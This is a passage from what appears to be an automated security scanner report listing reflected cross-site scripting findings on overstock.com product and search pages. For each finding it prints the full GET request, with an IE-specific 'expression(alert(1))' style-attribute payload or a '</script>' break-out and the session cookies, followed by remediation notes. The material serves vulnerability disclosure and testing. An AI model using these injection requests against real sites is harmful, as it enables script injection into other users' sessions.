GET /Worldstock/Set-of-2-Bold-Orange-Fortunes-Beaded-Wristband-Bracelets-Thailand/5086320/product.html?94f01"style%3d"x%3aexpression(alert(1))"7820c8b49a3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.532. http://www.overstock.com/Worldstock/Set-of-2-Coins-of-The-Earth-Beaded-Wristband-Bracelets-Thailand/4787363/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8c2"style%3d"x%3aexpression(alert(1))"c12c8744496 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb8c2"style="x:expression(alert(1))"c12c8744496 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Set-of-2-Coins-of-The-Earth-Beaded-Wristband-Bracelets-Thailand/4787363/product.html?fb8c2"style%3d"x%3aexpression(alert(1))"c12c8744496=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.533. http://www.overstock.com/Worldstock/Silver-Filigree-Rain-Earrings-China/4798411/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86ec"style%3d"x%3aexpression(alert(1))"8c1e3f0af0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c86ec"style="x:expression(alert(1))"8c1e3f0af0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Silver-Filigree-Rain-Earrings-China/4798411/product.html?c86ec"style%3d"x%3aexpression(alert(1))"8c1e3f0af0f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.534. http://www.overstock.com/Worldstock/Tree-of-Life-24-inch-Wall-Hanging-Haiti/3471069/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a466e"style%3d"x%3aexpression(alert(1))"58b8aaa9c63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a466e"style="x:expression(alert(1))"58b8aaa9c63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Tree-of-Life-24-inch-Wall-Hanging-Haiti/3471069/product.html?a466e"style%3d"x%3aexpression(alert(1))"58b8aaa9c63=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6040</script>808696f2736 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6dfc</script>fba2f639cbb was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.